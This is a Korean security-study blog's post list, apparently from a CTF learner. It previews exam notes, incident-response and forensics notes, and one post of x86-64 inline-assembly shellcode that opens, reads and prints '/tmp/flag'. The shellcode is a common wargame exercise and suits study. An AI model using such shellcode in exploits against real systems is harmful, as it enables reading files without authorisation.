목록전체 글 (420)
외로운 Nova의 작업실
- 제1분기(1월~3월) 2023.01.02 - [Hacking/Engineer Information Security] - 정보보안기사 필기 - 37(침해사고 대응 및 디지털 포렌식) 2023.01.03 - [Hacking/Engineer Information Security] - 정보보안기사 필기 - 38(각종 애플리케이션 보안 위협 및 대응책) 2023.01.03 - [Hacking/Engineer Information Security] - 정보보안기사 필기 - 39(정보보호 거버넌스와 관리 체계 수립) 2023.01.04 - [Hacking/Engineer Information Security] - 정보보안기사 필기 - 40(정보보호 위험 관리) 2023.01.05 - [Hacking/Enginee..
- 파일 열어서 읽고 출력하는 쉘코드 __asm__( ".global run_sh\n" "run_sh:\n" "push 0x67\n" "mov rax, 0x616c662f706d742f \n" "push rax\n" "mov rdi, rsp\n" "xor rsi, rsi\n" "xor rdx, rdx\n" "mov rax, 2\n" "syscall" "\n" "mov rdi, rax\n" "mov rsi, rsp\n" "sub rsi, 0x30\n" "mov rdx, 0x30\n" "mov rax, 0x0\n" "syscall" "\n" "mov rdi, 1\n" "mov rax, 0x1 \n" "syscall" "\n" "xor rdi, rdi\n" "mov rax, 0x3c\n" "syscall" )..
- 침해사고 대응과 포렌식 cert(computer emergency response team)이란 해킹과 바이러스에 대항하는 보안 기술을 개발하고 서비스하는 컴퓨터 응급 대응센터입니다. 사고전 준비 과정 : 사고가 발생하기 전 침해사고 대응팀과 조직적인 대응을 준비합니다. 초기 탐지 : 정보보호 및 네트워크 장비에 의한 이상 징후 탐지, 관리자에의한 침해사고를 식별합니다. 초기 대응 : 초기 조사를 수행하고 기본적인 사고정황에대한 세부사항을 기록하며 사고대응팀 신고 및 소집과 침해사고 관련 부서에 통지합니다. 대응 전략 체계화 : 최적의 전략을 결정하고 관리자 승인을 획드합니다. 초기 조사 결과를 참고하여 소송이 ㅍ칠요한 사항인지 수사기관 공조가 필요한 사항인지를 판단합니다. 사고 조사 : 데이터 수집..